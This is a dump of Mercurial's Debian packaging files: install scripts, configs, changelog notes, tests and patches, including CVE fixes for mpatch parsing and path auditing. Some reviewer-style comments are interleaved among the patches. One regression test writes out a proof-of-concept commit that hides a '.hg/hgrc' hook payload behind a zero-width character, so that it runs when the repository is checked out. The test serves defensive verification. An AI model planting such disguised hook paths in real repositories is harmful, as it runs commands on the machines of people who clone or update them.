debian/0000775000000000000000000000000013375565254007207 5ustar debian/mercurial.links0000664000000000000000000000011112201757705012214 0ustar usr/share/doc/mercurial-common/examples usr/share/doc/mercurial/examples debian/mercurial.postrm0000664000000000000000000000322412201757705012430 0ustar #!/bin/sh # postrm script for mercurial # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `remove' # * `purge' # * `upgrade' # * `failed-upgrade' # * `abort-install' # * `abort-install' # * `abort-upgrade' # * `disappear' # # for details, see http://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in purge) for conffile in hgext.rc; do # we mimic dpkg as closely as possible, so we remove configuration # files with dpkg backup extensions too: ### Some of the following is from Tore Anderson: for ext in '~' '%' .bak .dpkg-tmp .dpkg-new .dpkg-old .dpkg-dist .ucf-old .ucf-new .ucf-dist; do rm -f /etc/mercurial/hgrc.d/$conffile$ext done # remove the configuration file itself rm -f /etc/mercurial/hgrc.d/$conffile # and finally clear it out from the ucf database if which ucf >/dev/null; then ucf --purge /etc/mercurial/hgrc.d/$conffile fi if which ucfr >/dev/null; then ucfr --purge mercurial /etc/mercurial/hgrc.d/$conffile fi done ;; remove|upgrade|failed-upgrade|abort-install|abort-upgrade|disappear) ;; *) echo "postrm called with unknown argument \`$1'" >&2 exit 1 ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. 
#DEBHELPER# exit 0 debian/hgrc0000664000000000000000000000011612216001776010036 0ustar # system-wide mercurial configuration file # See hgrc(5) for more information debian/hgext.rc0000664000000000000000000000545512201757705010654 0ustar # mercurial configuration file for bundled hg extensions # See hgrc(5) for more information # Extensions included in Mercurial listed in alphabetical order [extensions] # changeset access control # hgext.acl = # allow user-defined command aliases # hgext.alias = # provides the 'bookmarks' command # hgext.bookmarks = # bugzilla integration # requires python-mysqldb # hgext.bugzilla = # show the children of the given or working dir revision # provides the 'children' command # hgext.children = # graph count of revisions grouped by template # provides the 'churn' command # hgext.churn = # add color output to status, qseries, and diff-related commands # hgext.color = # converts a foreign SCM to a Mercurial one # provides the 'convert' and 'debugsvnlog' commands # requires: # - bzr to convert from Bazaar # - cvs to convert from CVS # - python-celementtree or python-elementtree to convert from Darcs # - git-core to convert from Git # - tla to convert from GNU Arch # - monotone to convert from Monotone # - python-subversion to convert from Subversion # hgext.convert = # external diff program support # hgext.extdiff = # pull and merge remote changes # provides the 'fetch' command # hgext.fetch = # GnuPG signing # provides the 'sign', 'sigcheck' and 'sigs' commands # requires gnupg # hgext.gpg = # show revision graphs in terminal windows # provides the 'glog' command # hgext.graphlog = # CIA notification hook # hgext.hgcia = # allows browsing the history of a repository in a graphical way # provides the 'view' command # requires wish # hgext.hgk = # syntax highlighting in hgweb # requires python-pygments # hgext.highlight = # lets you split a merge into pieces # provides the 'imerge' command # hgext.imerge = # inotify-based status 
acceleration for Linux systems # provides the 'inserve' command # hgext.inotify = # allows you to change changelog and summary text # hgext.interhg = # CVS/RCS-like keyword expansion # hgext.keyword = # quilt-like patch queues # provides the 'q*' commands # hgext.mq = # email notifications # hgext.notify = # display output using a pager # hgext.pager = # make it easy to refer to the parent of a revision # hgext.parentrevspec = # send changes as series of email patches # provides the 'email' command # hgext.patchbomb = # removes files not known to mercurial # provides the 'purge' command # hgext.purge = # moves sets of revisions to a different ancestor # provides the 'rebase' command # hgext.rebase = # interactive change selection during commit # provides the 'record' command # hgext.record = # patch transplanting tool # provides the 'transplant' command # hgext.transplant = # non-Unicode MBCS filename support # hgext.win32mbcs = # Unix/Mac/DOS line ending conversion utilities # hgext.win32text = # mDNS/DNS-SD (Zeroconf) support for 'hg serve' # hgext.zeroconf = debian/mercurial-common.install0000664000000000000000000000030012231045361014017 0ustar debian/tmp/usr/lib contrib/mq.el usr/share/emacs/site-lisp contrib/logo-droplets.svg usr/share/mercurial contrib/hgk usr/share/mercurial/ contrib/hg-ssh usr/bin debian/hgrc etc/mercurial/ debian/hgext.rc.md5sums0000664000000000000000000000012212201757705012232 0ustar 4c808ced6b7ddc2e3c1514703bc238b9 0.9.5-3 80086669df3007b5b17d7d12efe03775 sarge debian/mercurial-common.dirs0000664000000000000000000000005612216001775013326 0ustar usr/share/mercurial/help etc/mercurial/hgrc.d debian/mercurial-common.bash-completion0000664000000000000000000000004212216001775015444 0ustar contrib/bash_completion mercurial debian/README.source0000664000000000000000000000004712201757705011356 0ustar See /usr/share/doc/quilt/README.source debian/NEWS0000664000000000000000000001065312201757705007702 0ustar mercurial (1.4.3-1) unstable; 
urgency=low

  mercurial.el (emacs mode for mercurial) is not installed anymore in emacs paths. Emacs22 or newer has vc-hg.el that is better. If needed, this file is still provided in the examples directory.

  The alias extension does not exist anymore as its functionalities are now in mercurial core. To avoid a spurious warning about the extension failing to load, users just have to remove it from their hgrc file.

 -- Vincent Danjean Mon, 15 Feb 2010 18:06:52 +0100

mercurial (1.1.2-1) unstable; urgency=low

  Since the 1.1.2-1 version, mercurial does not enable any extension by default anymore. Upstream asks us to do so because:
  - users can easily enable any extension if they wish, however they cannot disable an extension that has been enabled system-wide
  - upstream prefers that default Mercurial installation is the plain Mercurial without extension.

 -- Vincent Danjean Sat, 17 Jan 2009 17:47:06 +0100

mercurial (1.0-5) unstable; urgency=low

  Since the 1.0 version, mercurial handles most of the merges internally. This is an upstream decision (see upstream changeset f077815932ce) that the debian package will follow. This means that:
  - there is no hgmerge script any more
  - programs that were invoked by hgmerge (kdiff3, ...) are not by default
  See http://www.selenic.com/mercurial/wiki/index.cgi/MergeToolConfiguration for configuring mergetools with mercurial 1.0

 -- Vincent Danjean Tue, 20 May 2008 22:37:24 +0200

mercurial (1.0) unstable; urgency=low

  Since the 1.0 version, the hbisect extension is now provided as a built-in command. If you keep an older version of the hgext.rc file in /etc/mercurial/hgrc.d/ or a $HOME/.hgrc file with the extension enabled, mercurial will emit a warning: "failed to import extension hgext.hbisect: No module named hbisect". Just delete the hgext.hbisect entry in the hgext.rc and/or .hgrc file.

 -- Gerardo Curiel Wed, 02 Apr 2008 16:14:47 -0430

mercurial (0.9) unstable; urgency=low

  Since the 0.8.1-5 version, mercurial uses python2.4 instead of (currently the default on Debian systems) python2.3. This allows tailor to use the hg backend (tailor requires python2.4). If someone really needs the python2.3 version of mercurial, please tell me (with reportbug for example). I will then split the package in python modules (default, 2.3, 2.4, ...) and one executable.

  Note: if you copied the hgwebdir.cgi or hgweb.cgi script from the examples directory, do not forget to update it so that it runs /usr/bin/python2.4 instead of /usr/bin/python (or recopy it)

  UPDATE since 0.9-6: Due to the new python policy, mercurial modules are now available for all supported python versions in debian (currently 2.3 and 2.4)

 -- Vincent Danjean Tue, 4 Jul 2006 00:53:21 +0200

mercurial (0.8) unstable; urgency=low

  Upgrade notes:
  - diff and status commands are now repo-wide by default (use 'hg diff .' for the old behavior)
  - GPG signing is now done with the gpg extension
  - the --text option for commit, rawcommit, and tag has been removed
  - the copy/rename --parents option has been removed

 -- Vincent Danjean Mon, 30 Jan 2006 16:11:19 +0100

mercurial (0.6c-1) unstable; urgency=low

  Previous versions of mercurial can lead to conflicts for internal filenames if the repo has both a file 'foo' and a directory 'foo.d'. This version of mercurial solves this, however this means that some internal files have been renamed.

  If you want to use (commit, clone on same filesystem, ...) a repo created with an old version with the new version AND this repo contains a directory named 'foo.d', then you need to deal with it. According to the upstream author, something like this should do the trick:

    find .hg -type d -name "*.[di]" -exec echo mv {} {}.hg ";"

  Run this at the top of your working dir. Take out the 'echo' once you've confirmed it's finding the right files.

Also note that 0.6c and older clients should be perfectly compatible over the wire, so long as each side has the appropriate directory naming. But if you use 0.6c to pull into a repo created by 0.6b with changes that touch files in an affected directory, you're likely to have strange behavior. -- Vincent Danjean Tue, 23 Aug 2005 09:55:35 +0200 debian/mercurial.postinst0000664000000000000000000000252512216001775012765 0ustar #!/bin/sh # postinst script for mercurial # # see: dh_installdeb(1) set -e # summary of how this script can be called: # * `configure' # * `abort-upgrade' # * `abort-remove' `in-favour' # # * `abort-remove' # * `abort-deconfigure' `in-favour' # `removing' # # for details, see http://www.debian.org/doc/debian-policy/ or # the debian-policy package case "$1" in configure) for conffile in hgext.rc; do # Tell ucf that the file in /usr/share/mercurial is the latest maintainer # version, and let it handle how to manage the real configuration file in # /etc/mercurial/hgrc.d. ucf --sum-file /usr/share/mercurial/$conffile.md5sums --three-way \ /usr/share/mercurial/$conffile /etc/mercurial/hgrc.d/$conffile ucfr mercurial /etc/mercurial/hgrc.d/$conffile done ;; abort-upgrade|abort-remove|abort-deconfigure) ;; *) echo "postinst called with unknown argument \`$1'" >&2 exit 1 ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0 debian/upstream-signing-key.pgp0000664000000000000000000001763412261306322013772 0ustar  O)Wy|!z=F-GQA UFlq2ydBZUD lml=x˺C I١8W!j2fy☙,'Rcq\|ON|b<זI 檥8঱]:{ה<0RW[ .F[Sz1~ӉK^fcnf{ X!Q Qf\>λ,bT$uuHwn`?j|Ձ`KDVZ-’ j3K*,mQvpP31DNRʰ}pĘ CwW H7wQO -£{<0x ZM rRljeu=W 4WmrGbb>ipj ^䆗vZ5O{u>D no<Cb 366r?]cS 1q!Matthew Mackall FO 9y*])2(q;mʈI]DTf=J Q~x /wMd@55@c57XpaOMgP&" Q #U'+Th=`,Tڃ ^{=ɱHbmٷi=Iٞ Wˏޓy[vsͼ۷a Rpp\%C Yչ!r Yqiȱ&-+EY&}me!}36W}Qⶔ{@*dYp+9CQĊrCğ~zFCՔRHWl{J(i^<wFIU-? =]ljO #2OdV{GOC,i,[xtq>-P]$=mj{{C >c~I'cPgfN 4CyۖjܠAf(RU籄l}=C. 
G _yCz1^ "Б$lIo,t5Lb %R8N-)3epђy yp͍OEi$̩PWP=eXߊõ\Ӥο/+Z{xyJT$Sc뉱-yblV!fGoJ"rbi6>aw(3l鑡<* 4MiisܪA eZflگ$R|P7Xֻl֫(Bt0U֏H@]>F9Z6h=0 pߡᙟÅr{8B, TZsӖ4ç4YOX l?yQޙ͉ͳUOq ܂J*'hڪAɍQ^TS6Mۣ$o:4sI ~>+<,-?a 5dp Q oBbKga>։,:b1Hv>-MRfr~` W69):~/ЇG9)6={Q޳WP kPzA0ëzY-X3ZyL/bRS>ؕB'\N 3܉Mk+<^\7! 'KČﺅ:2W8Yd 0$0eHV=Z\zlC=DԧCM]19 ce\+,ӱ˂spa4t\& XŻΒߺҔ7|&0~F.>hU{3"Ҿh7⇽0EI=42: Trxc[[miI~7G/ An ўJ99tLdK1, 8Dڀ؄ey:7t 42\B=? zbW}.Ǐ9郿E[{pW+C!-G NnNăfr ӽnE>ۈļvT:llKO PNٶz[+{sr- N515VM{+15IRMuֲ$(A'41'-!>va0,ׇJ$_/PeG\909).\s/b;%ȂpW(nxC̈́)Z+0Ee,LPl7~ u HOsBޯLxE ޥۄm$w; n_⁾Å2~9Y NT2Z{VgQB:X8痊4؛q pe%t#'8S_(7f(q`:._Y|U׷lk'vC<̃ }en3hD'8NP|>5+5#`%InQSy%,SY̝@Lt9pTShG $LklMˬj#co~Ĝs9‘MPC/oH QQ>nBiq%5ɫ&|OG v%EK2u7VKw9r_|gFsQWEC -_2&sa-fhCY8B-54K&ΞΜ&d.Ds`Jgbt!^fT}]y*m.Xw훓ή;5;C>sHݦ^o)Bpm90SV l@ ]X p& q+nm=V8釮hVGLUan׎UATTµz1RD2{JHؓO)㳣،9F yKBTpFc589 D4bMW"5Fċ+sA‹oрgşjC`msP5Nz%zmtZ ,Psj_H؇x % ~;$W@˝KE719i:툇lԿ)MO;7QTKwPOI@!" oAy ]ȱ;oWǥn/bǷOqnSW(f)AGg^Mbe+nby5-S'l'zZyEisiq$#)38njh4&КXMs NdbRps"۸JM+Mw+)hYM%uջ +~>}TIPG ƔgĐ.7;7)T {ЙHBEĔl-5G ORK嶛r 5O)?OMjr"&?hɚ(٩qQq|>q :wzFҕs_ޥG|>ã4[)/mc$4iɘ6\BՈF!imP,j'P2^B'Xi,OLX# I|(Igͧ`EDT'tExbz %<$BIy2<|r!y_@]%μh̤rٲj`zjJRZY19Dp̱ɖ$d1Ѫ6Hq{2ݥ4Y!Ď=Zc]5d_X/ d- +ϳ=4ts4 ZE)B\q8 XO0V_8^`ӬYY90 O  PNٶz[>>H`+SLa Sy.ُ l0dkt߈? 
wmJHt ͣT}^mVvHq[k[M X['Ue5&agʯ퀶jce(l^M eG$E<貐OĦa<@.6P6M궏pʈ41_w}9s.$4wحI;zf*#Y]٩?iRd핁E o49PM*']iOw75|\A{p`ϦV.qnt+7mVT3E?tO`_ƛg4qpCdOʠw#(>"h[3oQ;rEwgYYy= @d$Q|AH.h=%pd8B"4?֢D}fzd#/9"h )%0ǟ<]$we=$N@   QVx Eʩ*q{²ccjc)1t`ݷ-2X]n^;+ i]THo[Íe r;CrYYBG.iX{$  HkPfni;"CM6zRmٍǘ;bٜ[kDPLnI(D>_ԝA,wNs\Lt/`Xtضf|EʌN@7G*k5Cad!\Wfk:%μIAhs5WzV0.hI3yl~[ٻϹfsxni#U+y;q!l:KXEvdp29mk ]WmkQI i `_gϓ^ pp%9,>bO]./EC=R8׍(BFGsف Q/l$TVr,op^j #4(T=YB`3< 7ב.)" Q  V~&FԦh}M NviFZޒT8[c%eAp»}gAR3^9B`R1ul7OQ cheq`]Q=)PI&3ųxb]L'-b._wvoAV; < I+!2R'o .@Up:K(8DV-[cajnV0C?؎q+Ek䐅\uxΓ,f~?B-傫~-r1 IIuh$v!P405$){7 >\G̈́ݾs5Y/mxʼiP?N]'ͥ^yn$Uc^ ~~2e9-Iż't0BlFerNJbJI413C0Z'/Ħ ESdd*^9P7, Ñx_IC=geQO$ޥflW?q;`R 9_1}X ޙ=f.Y?siM0daUNҽ<:j"+8D 1h7;@{INξeх$}#u6LuoVoV-Ae\nB8#=WLƴFe" O)ˎ#(b`aT@@L\ dvkAG  1f7.3$p./GPӎ)z/_!J{4m iH$Sq L +3$x]ہ$?pyi^l'B",7&eJW'l=Q/%(>ZnO&t"HYa!aV9qjUV1 0TC,~ϖ-u@܏17 g. "scCqHPqݠ[ o* ^f=Jć%,T{U%Qk739K~'HXD@,X Dzk'AYR)7>)WNu5b)܍gyZ ̕N}aVa1`m~e0ZA7K*o=(dQ[_.~0wH\>Nz|z O)  Wh*-rߖNNy#%/rl>1*7)+z7&Ÿe3Wkth_$C|^R F܋ @>GYmH񞵤L71s+lIn:>ϻ*P*"'h?Rm/Weuư }L~VEPu q8;~<3nޱvp4d^M?q%Ytc=Sa9W5KD||[xE!"luy1&h~$>>.b/CF cFtgS77^F6s4QXR߁!b6ʾ(,iCuvIQԨ&&5T?c1 /*j˚> 4Z, &HM"FO7YB31E¶L_%3 F˜p8?R+v':yQo{ n|bac!W8udebian/tests/0000775000000000000000000000000012266004014010325 5ustar debian/tests/testsuite0000775000000000000000000000007512227057340012315 0ustar #!/bin/sh exec make tests TESTFLAGS="--with-hg=/usr/bin/hg" debian/tests/mercurial-git0000775000000000000000000000024012244566475013037 0ustar #!/bin/sh git init try cd try git config user.email babar@jungle.org echo a >a git add a git commit -m a cd .. 
exec hg --config extensions.git= clone try try2 debian/tests/control0000664000000000000000000000034412266004014011731 0ustar Tests: testsuite Depends: @, zip, unzip, netbase, python-subversion, monotone, cvs, bzr, tla, darcs Restrictions: allow-stderr #Tests: hgsubversion #Depends: @, hgsubversion Tests: mercurial-git Depends: @, mercurial-git, git debian/tests/hgsubversion0000775000000000000000000000017212233556050012777 0ustar #!/bin/sh exec hg --config extensions.hgsubversion= clone svn://anonscm.debian.org/python-apps/packages/mercurial/trunk/ debian/cacerts.hgrc0000664000000000000000000000026212201757705011467 0ustar [web] # user can disable this Debian default by overriding this option in ~/.hgrc # and/or using the --insecure command line switch cacerts = /etc/ssl/certs/ca-certificates.crt debian/README.Debian0000664000000000000000000000200412201757705011233 0ustar Mercurial for Debian -------------------- Table of contents * Documentation * Extensions provided in this package and their dependencies * Other extensions * Emacs support Documentation ************* Mercurial documentation is available on the web at: http://hgbook.red-bean.com/ and http://mercurial.selenic.com/wiki/ Extensions ********** Extensions can be enabled system-wide, per-user and/or per repository (see hgrc(5) for more information). Previous versions of this Debian package enabled some extensions by default; however, this is no longer the case. To enable extensions system-wide, you may edit the /etc/mercurial/hgrc.d/hgext.rc configuration file. This file also contains information on the dependencies of each extension. Emacs support ************* This package installs a mercurial.el file in the example directory (/usr/share/doc/mercurial/examples/). However, with emacs22 or better, vc-hg.el provided directly by emacs is better. This is why mercurial.el is not installed by default anymore. 
debian/mercurial.dirs0000664000000000000000000000003012216001776012031 0ustar usr/share/doc/mercurial debian/patches/0000775000000000000000000000000013375564052010631 5ustar debian/patches/CVE-2018-13348.patch0000664000000000000000000000165513373604506013343 0ustar # HG changeset patch # User Augie Fackler # Date 1524890536 14400 # Node ID 90a274965de74cb0b4bea01a564b29b12a6af814 # Parent c0081d3e1598e0c82cf5024422dc206db83687de mpatch: be more careful about parsing binary patch data (SEC) It appears to have been possible to trivially walk off the end of an allocated region with a malformed patch. Oops. Caught when writing an mpatch fuzzer for oss-fuzz. This defect is OVE-20180430-0001 or CVE-2018-13348. --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -303,7 +303,9 @@ static struct flist *decode(const char *bin, Py_ssize_t len) lt = l->tail; - while (pos >= 0 && pos < len) { + /* We check against len-11 to ensure we have at least 12 bytes + left in the patch so we can read our three be32s out of it. */ + while (pos >= 0 && pos < (len - 11)) { lt->start = getbe32(bin + pos); lt->end = getbe32(bin + pos + 4); lt->len = getbe32(bin + pos + 8); debian/patches/deb_specific__support_mo_in_fhs.patch0000664000000000000000000000066012231045361020212 0ustar Author: Vincent Danjean Description: Look for *.mo files in /usr/share/locale (FHS compliant) Forwarded: not-needed --- a/mercurial/i18n.py +++ b/mercurial/i18n.py 
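Review bot: The new bound `pos < (len - 11)` in decode() encodes the 12-byte record header only as the literal 11, while the reads just below use the offsets 0, 4 and 8; a named constant and the form `pos <= len - 12` would keep the bound and the three `getbe32` reads visibly in step. `len` is a signed `Py_ssize_t`, so an input shorter than 12 bytes makes the bound non-positive and the loop is skipped rather than wrapping. With this change an input that ends in a partial header now leaves the loop early, so rejecting it depends on the check that follows the loop, which is outside the hunk and should be confirmed. The values stored in `lt->start`, `lt->end` and `lt->len` come straight from the untrusted patch and their validation is also not visible here; a regression test feeding a truncated patch would pin the behaviour.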
@@ -15,7 +15,7 @@ else: module = __file__ base = os.path.dirname(module) -for dir in ('.', '..'): +for dir in ('.', '..', '/usr/share'): localedir = os.path.join(base, dir, 'locale') if os.path.isdir(localedir): break debian/patches/CVE-2014-9390.pt20000664000000000000000000000554012540341715012657 0ustar Backport of: Origin: c02a05cc6f5e661b09b0b0c65ec7bc874e161f9c (backport) # HG changeset patch # User Augie Fackler # Date 1418753297 18000 # Node ID c02a05cc6f5e661b09b0b0c65ec7bc874e161f9c # Parent 7a5bcd471f2ef302613b8551a79081d46d04be6e pathauditor: check for codepoints ignored on OS X Index: mercurial-2.8.2/mercurial/scmutil.py =================================================================== --- mercurial-2.8.2.orig/mercurial/scmutil.py +++ mercurial-2.8.2/mercurial/scmutil.py @@ -5,6 +5,7 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. +import encoding from i18n import _ from mercurial.node import nullrev import util, error, osutil, revset, similar, encoding, phases, parsers @@ -19,6 +20,9 @@ else: systemrcpath = scmplatform.systemrcpath userrcpath = scmplatform.userrcpath +def _lowerclean(s): + return encoding.hfsignoreclean(s.lower()) + def nochangesfound(ui, repo, excluded=None): '''Report no changes for push/pull, excluded is None or a list of nodes excluded from the push/pull. 
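Review bot: The added `'/usr/share'` entry only works because `os.path.join(base, dir, 'locale')` discards `base` when a later component is absolute, and nothing in the loop says so. A comment above the loop would keep a later cleanup from breaking it, for example `# '/usr/share' is absolute: os.path.join() drops base and yields /usr/share/locale (FHS)`. The module-relative `'.'` and `'..'` entries are still tried first, so a `locale` directory next to the module continues to take precedence over the system catalogs; that ordering is worth stating in the same comment.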
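Review bot: The added `import encoding` at the top of scmutil.py is redundant, because the context line `import util, error, osutil, revset, similar, encoding, phases, parsers` already brings `encoding` into scope. Dropping the new line keeps the backport to the lines that change behaviour.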
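Review bot: `_lowerclean` is the helper the path audit now relies on, yet it has no docstring and calls `encoding.hfsignoreclean`, which this patch does not define. The `.pt2` file name suggests an earlier part of the series adds it, but that is not visible here, so the dependency should be stated in the patch header. A one-line docstring would also help, for example `'''Lowercase s and drop the code points encoding.hfsignoreclean removes, for comparison against '.hg'.'''`.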
@@ -143,11 +147,11 @@ class pathauditor(object): raise util.Abort(_("path ends in directory separator: %s") % path) parts = util.splitpath(path) if (os.path.splitdrive(path)[0] - or parts[0].lower() in ('.hg', '.hg.', '') + or _lowerclean(parts[0]) in ('.hg', '.hg.', '') or os.pardir in parts): raise util.Abort(_("path contains illegal component: %s") % path) - if '.hg' in path.lower(): - lparts = [p.lower() for p in parts] + if '.hg' in _lowerclean(path): + lparts = [_lowerclean(p.lower()) for p in parts] for p in '.hg', '.hg.': if p in lparts[1:]: pos = lparts.index(p) Index: mercurial-2.8.2/tests/test-commit.t =================================================================== --- mercurial-2.8.2.orig/tests/test-commit.t +++ mercurial-2.8.2/tests/test-commit.t @@ -306,4 +306,21 @@ commit copy 0 0 6 ..... 0 26d3ca0dfd18 000000000000 000000000000 (re) 1 6 7 ..... 1 d267bddd54f7 26d3ca0dfd18 000000000000 (re) +verify pathauditor blocks evil filepaths + $ cat > evil-commit.py < from mercurial import ui, hg, context, node + > notrc = u".h\u200cg".encode('utf-8') + '/hgrc' + > u = ui.ui() + > r = hg.repository(u, '.') + > def filectxfn(repo, memctx, path): + > return context.memfilectx(path, '[hooks]\nupdate = echo owned') + > c = context.memctx(r, [r['tip'].node(), node.nullid], + > 'evil', [notrc], filectxfn, 0) + > r.commitctx(c) + > EOF + $ $PYTHON evil-commit.py + $ hg co --clean tip + abort: path contains illegal component: .h\xe2\x80\x8cg/hgrc (esc) + [255] + $ cd .. debian/patches/deb_specific__use_sensible-editor.patch0000664000000000000000000004102412261301466020424 0ustar Use sensible-editor as default instead of vi. --- a/hgeditor +++ b/hgeditor @@ -7,7 +7,7 @@ # only for Mercurial, modify this: case "${EDITOR}" in "") - EDITOR="vi" + EDITOR="sensible-editor" ;; emacs) EDITOR="$EDITOR -nw" --- a/mercurial/commands.py +++ b/mercurial/commands.py 
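Review bot: In the rewritten list comprehension, `_lowerclean(p.lower())` lowercases each component twice, since `_lowerclean` already calls `s.lower()` before cleaning. `lparts = [_lowerclean(p) for p in parts]` is equivalent and matches how `parts[0]` and `path` are handled on the neighbouring lines. The abort message still formats the raw `path`, which is the right choice for diagnostics because the cleaned form would hide the offending bytes. The method starts and ends outside the hunk, so the later use of `lparts` cannot be checked from here.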
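Review bot: The added test covers only the first-component check, because the path it commits begins with the disguised directory name. The `lparts[1:]` branch that the same patch changes in scmutil.py is not exercised. A second case with the component below a normal directory would cover that branch. An assertion that no hgrc was written after the aborted checkout would also make the test fail on a partial update, not only on a missing abort message.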
@@ -2095,8 +2095,8 @@ def debuginstall(ui): editor = ui.geteditor() cmdpath = util.findexe(editor) or util.findexe(editor.split()[0]) if not cmdpath: - if editor == 'vi': - ui.write(_(" No commit editor set and can't find vi in PATH\n")) + if editor == 'sensible-editor': + ui.write(_(" No commit editor set and can't find sensible-editor in PATH\n")) ui.write(_(" (specify a commit editor in your configuration" " file)\n")) else: --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -755,7 +755,7 @@ class ui(object): # avoid confusion. editor = 'E' else: - editor = 'vi' + editor = 'sensible-editor' return (os.environ.get("HGEDITOR") or self.config("ui", "editor") or os.environ.get("VISUAL") or --- a/i18n/da.po +++ b/i18n/da.po @@ -8752,7 +8752,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your configuration file)\n" @@ -13521,7 +13521,8 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" msgid "" @@ -14194,7 +14195,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/de.po +++ b/i18n/de.po 
@@ -13738,8 +13738,8 @@ msgid "checking commit editor...\n" msgstr "Prüfe Editor für Versionsmeldungen...\n" #: mercurial/commands.py:2093 -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " Kein Editor für Versionsmeldungen angegeben und vi nicht im PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " Kein Editor für Versionsmeldungen angegeben und sensible-editor nicht im PATH\n" #: mercurial/commands.py:2094 mercurial/commands.py:2098 msgid " (specify a commit editor in your configuration file)\n" @@ -20474,7 +20474,8 @@ msgstr "" #: mercurial/help/config.txt:1156 msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" #: mercurial/help/config.txt:1159 @@ -21471,7 +21472,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " Manchmal muss Mercurial eine Textdatei in einem Editor öffnen, damit\n" @@ -21480,7 +21481,7 @@ msgstr "" " variablen HGEDITOR, VISUAL und EDITOR (in dieser Reihenfolge) " "ermittelt.\n" " Der erste nicht-leere wird verwendet. Wenn alle Angaben leer sind,\n" -" wird die Voreinstellung 'vi' verwendet." +" wird die Voreinstellung 'sensible-editor' verwendet." #: mercurial/help/environment.txt:99 msgid "" --- a/i18n/el.po +++ b/i18n/el.po @@ -274,7 +274,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" 
@@ -6364,7 +6364,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your .hgrc file)\n" --- a/i18n/fr.po +++ b/i18n/fr.po @@ -299,7 +299,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" @@ -8201,7 +8201,7 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "" -msgid " No commit editor set and can't find vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" msgstr "" msgid " (specify a commit editor in your .hgrc file)\n" --- a/i18n/it.po +++ b/i18n/it.po @@ -7156,8 +7156,8 @@ msgstr "" msgid "Checking commit editor...\n" msgstr "Sto controllando l'editor per il commit...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr "Nessun editor per il commit trovato e non trovo vi in PATH\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr "Nessun editor per il commit trovato e non trovo sensible-editor in PATH\n" msgid " (specify a commit editor in your configuration file)\n" msgstr "" @@ -10461,7 +10461,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" msgid "" --- a/i18n/ja.po +++ b/i18n/ja.po 
@@ -11954,8 +11954,8 @@ msgstr " (テンプレートのインス msgid "checking commit editor...\n" msgstr "メッセージ入力用エディタの確認中...\n" -msgid " No commit editor set and can't find vi in PATH\n" -msgstr " エディタが起動できません(vi にも PATH が通っていません)\n" +msgid " No commit editor set and can't find sensible-editor in PATH\n" +msgstr " エディタが起動できません(sensible-editor にも PATH が通っていません)\n" msgid " (specify a commit editor in your configuration file)\n" msgstr " (コミットログ用エディタを設定ファイルで設定してください)\n" @@ -18499,11 +18499,12 @@ msgstr "" msgid "" "``editor``\n" -" The editor to use during a commit. Default is ``$EDITOR`` or ``vi``." +" The editor to use during a commit. Default is ``$EDITOR`` or\n" +" ``sensible-editor``." msgstr "" "``editor``\n" " コミットログ入力用エディタ。 無指定の場合、 ``$EDITOR`` ないし\n" -" ``vi`` が使用されます。" +" ``sensible-editor`` が使用されます。" msgid "" "``fallbackencoding``\n" @@ -19662,7 +19663,7 @@ msgid "" " editor it uses is determined by looking at the environment\n" " variables HGEDITOR, VISUAL and EDITOR, in that order. The first\n" " non-empty one is chosen. If all of them are empty, the editor\n" -" defaults to 'vi'." +" defaults to 'sensible-editor'." msgstr "" "EDITOR\n" " コミットログ入力時のように、 エディタでファイルを開き、\n" @@ -19670,7 +19671,7 @@ msgstr "" " そこで使用されるエディタは、 HGEDITOR、 VISUAL\n" " あるいは EDITOR 環境変数に設定されたものを(この順序で)使用します。\n" " 最初の空で無い値に設定された環境変数の値を使用します。\n" -" いずれも未設定 (あるいは空) の場合は、 'vi' が使用されます。" +" いずれも未設定 (あるいは空) の場合は、 'sensible-editor' が使用されます。" msgid "" "PYTHONPATH\n" --- a/i18n/pt_BR.po +++ b/i18n/pt_BR.po @@ -12122,10 +12122,10 @@ msgstr " (modelos 